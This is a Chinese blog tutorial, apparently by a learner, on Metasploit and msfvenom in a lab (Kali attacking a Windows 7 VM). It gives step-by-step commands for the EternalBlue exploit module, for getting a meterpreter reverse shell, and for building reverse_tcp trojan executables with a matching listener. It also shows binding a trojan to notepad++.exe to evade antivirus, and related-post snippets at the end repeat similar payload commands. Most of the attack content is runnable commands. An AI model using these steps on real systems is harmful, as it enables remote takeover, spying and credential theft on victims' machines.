metasploit,msfvenom(生成木马后门)初步学习

已于 2024-02-29 11:36:39 修改
阅读量938 收藏 15
点赞数 23
文章标签: 网络攻击模型 安全架构 计算机网络
于 2024-02-01 22:29:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80951345/article/details/135975883
版权
本文介绍了Metasploit框架及其Meterpreter模块的使用,包括利用永恒之蓝漏洞、生成Windowsx64Meterpreter后门、捆绑木马以及实现免杀和加壳的技术。详细步骤展示了如何配置漏洞攻击、生成木马文件以及在目标机上操作。
摘要由CSDN通过智能技术生成

metasploit

  • metasploit
    • 介绍
    • 使用
    • meterpreter
  • msfvenom(生成木马后门)
    • 介绍
    • 使用
    • 免杀
      • 捆绑木马
      • 加壳

攻击机为kali,IP:192.168.23.129
靶机为windows7,IP:192.168.23.132
以永恒之蓝漏洞为例

metasploit

介绍

msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。(可以让复杂的漏洞攻击流程变的非常简单)

使用

  1. 在命令行输入msfconsole
    在这里插入图片描述

  2. 使用模块

    • 输入search 漏洞编号如:
      kali机中的运行
      以ms17_010(永恒之蓝)为例。

  3. 配置模块必选项。

    • 复制序号0对应的
    exploit/windows/smb/ms17_010_eternalblue

    show options  #拉出设置

    • (显示相关配置)required对应为yes的是必选项。在这里插入图片描述
      在这里插入图片描述

    • 逐个输入

       set RHOSTS IP靶机
 set Payload windows/x64/meterpreter/reverse_tcp
 set LHOST IP地址攻击机
      • RHOSTS为被攻击目标,LHOST为攻击的主机,ipconfig或者ifconfig查看IP是否正确,不对的改一下
      • Payload是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter,payload包含在exploit里。这里payload已默认为windows/x64/meterpreter/reverse_tcp,可改可不改
      • 端口设置成没有被占用的。
      • 代码运行
        在这里插入图片描述

  4. 运行模块

    run

    如图在这里插入图片描述
    在run之后最后一行会出现meterpreter,表明此过程作用是获取meterpreter,如图。
    在这里插入图片描述

meterpreter

meterpreter是metasploit框架中的一个拓展模块,是一个强大的后渗透模块,可以输入help查看帮助信息
可以远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统等等
我们可以输入help查看我们可以进行的操作。
在这里插入图片描述
如查看靶机的网络摄像头情况,输入webcam_list,这里可以看到没有摄像头。
在这里插入图片描述

msfvenom(生成木马后门)

介绍

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。(是在shell中使用)

使用

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe

在这里插入图片描述
lhost为主机ip,lport设置为没有被占用的端口号。
代码运行
在这里插入图片描述
这样木马文件就生成了
在这里插入图片描述

  • 开启对应端口(9999)
    msfconsole

    use exploit/multi/handler
  • 进行和上文差不多的设置
    show options
    在这里插入图片描述
    对应msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.129 lport=9999 -f exe -o demo.exe这一命令进行更改。
    set lhost 192.168.123.129
set lport 9999
set payload windows/x64/meterpreter/reverse_tcp
  • 最后
    run

在这里插入图片描述
这里run的成功运行需要靶机点击对应的木马文件

  • 然后输入help查看可以进行的操作如操控对方鼠标和摄像头。

免杀

捆绑木马

把木马文件与正常的文件(.exe)捆绑
如下列代码把木马文件与notepad-plus-plus.org/捆绑

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.23.129 lport=9999 -f exe -x notepad++.exe -o demo1.exe

加壳

压缩壳,加密壳

此乃大忽悠
关注
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5382
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploitmsfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
Kali Linux渗透测试小实践——Metasploit后门木马
PICACHU+++的博客
01-08 2940
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
msfvenom生成远控后门木马
2303_76389797的博客
04-18 390
这三个指令实在msf夺取了目标机的终端后才可以执行的,screenshot的意思是对目标机进行截图并且保存到本机,run vnc则是可以对目标机进行实时监控,hashdump是获取目标机的密码,不过要说的是,这时候获取的密码为Windows中经过ntml加密的密文,需要进行破译才可获取明文密码。这里设置的是payload以及本机的host和port,注意这里设置的一定要与上面生成木马的时候保持一致。这一句就是开始进行监听,如果有目标机点击了你的木马程序这里的终端会自动切换成目标机的终端。
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马
weixin_51803729的博客
02-11 7510
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马
Msfvenom生成木马实验
m0_74025111的博客
04-24 1207
编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload。
利用msfvenom生成后门木马
qq_28147861的博客
01-18 2805
msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。 用msfvenom生成一个PHP语言的PNG图片木马 代码:msfvenom -p php/meterpreter/reverse_tcp lh
metasploitmsfvenom生成木马入侵电脑及手机
爱我非你莫属的博客
10-08 3182
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有–payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --help-formats metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个
msf-Msfvenonm生成后门木马
热门推荐
weixin_45588247的博客
08-27 1万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   机: windows10虚拟机:192.
msfvenom生成木马的简单利用
dodod2012的专栏
07-15 4733
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport.
木马生成工具】Msfvenom介绍及利用
aheyor的博客
07-03 1518
msfvenom aMetasploitstandalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
使用msfvenom生成被控端并进行远程控制
Z_3679的博客
07-01 440
使用-p使用LHOST和LPORT选项指定攻击者的IP地址和端口使用-fexeapkphpraw使用-o选项指定输出文件的路径和名称使用RHOST和RPORT选项指定目标的IP地址和端口其他选项根据不同payload类型而有所不同使用-e使用--list选项列出可用的payload、编码器、nop等模块使用--help选项获取帮助信息使用-n选项关闭payload的后门
termux怎么生成木马_metasploit 生成木马常用命令
weixin_39926040的博客
12-21 1260
生成反弹木马:1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe //exe文件2. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > ap...
Metasploit 生成木马
2201_75516783的博客
11-28 813
Ox01 简介 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploitmsfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
2023护网蓝初面试题汇总
m0_74131821的博客
05-18 1920
日薪1000+的护网行动开始招人了,有想法的速看!
舍伍德业务安全架构(Sherwood Applied Business Security Architecture, SABSA)
qq_69100706的博客
10-15 621
舍伍德业务安全架构(Sherwood Applied Business Security Architecture, SABSA)是一个企业级的安全架构框架,它提供了一个全面的方法来设计和实现信息安全策略。SABSA模型将业务需求与安全控制相结合,确保企业的信息安全措施能够支持其商业目标。SABSA架构基于分层的模型,每一层都有不同的抽象级别和细节程度,从战略到操作层面逐步细化。
rhino grasshoper 框内物体排列(附视频).gh
最新发布
10-18
【闭合线内物体按方向移动/排列】https://www.bilibili.com/video/BV1z1WfeSEWu?vd_source=b420114c993138474d2e93d83ead77a5
kwant-1.4.3-cp38-cp38-win_amd64.whl
10-18
kwant-1.4.3-cp38-cp38-win_amd64.whl
rhino grasshoper 景观椅(附视频).gh
10-18
【rhino@grasshoper 曲线金属座椅景观案例(文件获取/见简介)】https://www.bilibili.com/video/BV1Dx4y147Lr?vd_source=b420114c993138474d2e93d83ead77a5
PCIe通义万问系列文档的第一部已整理完毕,含999个PCIe相关问答
10-18
《PCIe通义万问》系列文档旨在记录PCIe相关行业工程师们在PCIe协议学习、IP设计验证、产品测试及使用过程中遇到的问题、迸发的思考、进行的探讨及可能的解决方案,以期给遇到相同相似问题的同行们些许启发。文档涉及的技术方向主要为PCIe,也包含PCIe相关的CXL、UCIe及计算机体系结构相关内容。 本文档是《PCIe通义万问》系列文档之(一),含999个问题。问题内容有以下三个来源:MangoPapa(下称博主)的“PCIe每日一问一答”系列专栏;博主的博文留言及私信讨论;博主作为群主的“PCIe技术交流群”群聊内容。MangoPapa小助理、折叠、先杰、CR小队长、kangling共同完成了问答内容提取与归纳整理,噫嘘唏及慕荷负责文辞优化及编辑排版,上述人员及MangoPapa、JasonW、皮塞阿姨、席可儿参与了文档内容的审校。感谢以上人员的无私奉献。 本文档仅对讨论内容进行总结记录,不保证问题答案的正确性,部分问题只提供解决思路或讨论过程。术业有专攻,文内定有偏颇。如您发现谬误,一敬希原宥,二望乞点拨;如您持异见,欢迎来信讨论。如有需要,欢迎联系MangoPapa加入相关
msfvenom生成安卓后门
09-10
msfvenomMetasploit框架的一个工具,用于生成恶意软件,包括后门。在使用msfvenom生成安卓后门时,我们需要首先了解一些基本概念和步骤。 首先,我们需要安装和设置Metasploit框架。然后,我们可以使用msfvenom命令创建后门。该命令的基本语法如下: msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地主机IP地址> LPORT=<本地主机端口> -o <输出文件路径> 这里的LHOST标识我们的本地主机IP地址,LPORT标识本地主机的端口号,-o表示输出文件路径。我们可以根据自己的需要进行调整。 生成后,我们可以将后门APK文件传输到目标安卓设备上,然后通过欺骗用户或利用其他手段将后门应用程序执行。一旦应用程序被执行,它会与我们在msfvenom中设置的本地主机IP地址和端口进行通信。 我们还可以进一步优化生成后门,例如: - 使用其他有效载荷,如android/meterpreter/reverse_http或android/meterpreter/reverse_https,以使用HTTP或HTTPS通信。 - 添加可执行权限,以确保安卓设备可以正确执行后门应用程序。 - 使用混淆技术来隐藏后门应用程序的真实目的,增加其对抗检测工具的能力。 总之,通过使用msfvenom工具,我们能够生成定制的安卓后门,用于安全测试和研究目的。然而,请注意在任何环境中合法和道德使用此类工具,并始终遵守法律和道德准则。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值